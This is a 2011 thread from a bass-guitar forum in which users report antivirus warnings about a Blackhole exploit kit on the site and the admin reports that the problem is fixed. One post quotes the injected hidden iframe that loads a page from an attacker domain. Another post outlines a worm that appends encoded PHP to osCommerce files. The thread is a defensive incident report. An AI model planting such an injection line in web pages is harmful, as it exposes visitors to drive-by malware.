Tuesday, 12 April 2011
  0 Replies
  13 Visits
0
Votes
Undo
  Subscribe
OK I was just cruising the Dingwall Forum and my Symantec Endpoint Protection firewall/antivirus keeps giving me the following message: [b:142tdkgt]"Web Attack: Blackhole Toolkit Website detected"[/b:142tdkgt] Perhaps the webmasters should have a look to make sure the site has not been compromised. Thanks.
10 years ago
·
#20252
0
Votes
Undo
also getting detections
10 years ago
·
#20253
0
Votes
Undo
I am getting this message on this site only: Do you want open or save [b:19g3dy7n]jquery.js[/b:19g3dy7n] from [b:19g3dy7n]rthlsinks.cz.cc[/b:19g3dy7n] It just appeared this morning and it is not coming up anywhere else I have been on the net. I am running BitDefender anti virus and web protection.
10 years ago
·
#20254
0
Votes
Undo
Chrome told me the same about rthlsinks.cz.cc. There's iframes all along the source code : [code:11ei1k1a]<div style="display:none"><iframe src="http://rthlsinks.cz.cc/xp/index.php?tp=bdd9e836c0f58a18"></iframe></div>[/code:11ei1k1a] Could the webmaster do something fast, before everyone's get pwned by this ?
10 years ago
·
#20255
0
Votes
Undo
I've been poking around the 'net, and it looks like a very serious attack. Exploited vulnerabilities in Java have been at least partially addressed by Version 6, Update 24: http://java.com/en/download/index.jsp
10 years ago
·
#20256
0
Votes
Undo
I'm not getting any messages now and I see Jesse online so I presume he has it under control. Big thanks!!
10 years ago
·
#20257
0
Votes
Undo
For god sake do not accept any invitation to download anything, it is a spyware worm. Do not open it!
10 years ago
·
#20258
0
Votes
Undo
Found something about it too : [quote:czt87x1f]I've finally figured out how it works. It's a sort of worm that targets osCommerce. The encoded version is added to the end of PHP files that are writeable. The parts of tags that can be seen are actually used for placing the decoded version inside a file. These scripts then all trigger when a page is rendered and call the distant jquery file. This causes a dramatic slowdown of the infected website and it's no wonder as the distant accesses grow. I have yet to determine where the flaw is.[/quote:czt87x1f] Do you use osCommerce for the online shop ?
10 years ago
·
#20259
0
Votes
Undo
I've send off an email to Sheldon about this. I received a warning on my iPhone today when I visited the site while at lunch at work...saying that 'windows had detected' something or other. Definitely something not right. PLEASE be careful and don't take ANY prompts that happen while you're on the Dingwall message board right now. Sheldon is aware of the situation and has asked Jesse to check it out. Please still be careful, folks...
10 years ago
·
#20260
0
Votes
Undo
Hi guys, the attack has now been handled. We've wiped out the infected file and installed a patch to prevent this kind of attack from happening again. Please let us know how it goes in your side.
10 years ago
·
#20263
0
Votes
Undo
Thanks Jesse!
10 years ago
·
#20264
0
Votes
Undo
Thanks for the quick repair.
10 years ago
·
#20265
0
Votes
Undo
Looking clear now. Thanks.
  • Page :
  • 1
There are no replies made for this post yet.
Be one of the first to reply to this post!